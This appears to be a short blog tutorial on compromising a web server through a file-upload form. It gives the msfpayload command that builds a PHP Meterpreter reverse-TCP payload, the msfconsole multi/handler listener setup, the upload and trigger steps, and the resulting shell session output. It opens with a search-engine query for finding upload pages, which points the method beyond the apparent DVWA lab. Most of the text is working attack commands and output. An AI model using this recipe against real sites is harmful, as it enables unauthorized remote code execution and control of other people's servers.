inurl:upload

1.Using msfpayload in backtrack 5r1

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php

2. Connection.php is created in root.

3. Open msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST Your-IP-Address

set LPORT 8080

exploit

4. Upload the file to a website then search for it eg dvwa/hackable/uploads
[ ]    connection.php    21-Jan-2011 11:06     1.3K

5. Double click it.

This should make the remote server tunnel back to your pc.

[*] Started reverse handler on your-ip-addrses:8080
[*] Starting the payload handler…
[*] Sending stage (38791 bytes) to there-ip-addrses
[*] Meterpreter session 1 opened (your-ip-addrses:8080 -> there-ip-addrses:49119) at 2012-06-26 15:00:18 +0100

meterpreter >

meterpreter > sysinfo
Computer    : dojo-vm
OS          : Linux dojo-vm 2.6.32-25-generic #44-Ubuntu SMP Fri Sep 17 20:26:08 UTC 2010 i686
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)

http://www.myexploit.wordpress.com/control-metasploit-php-file-upload/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s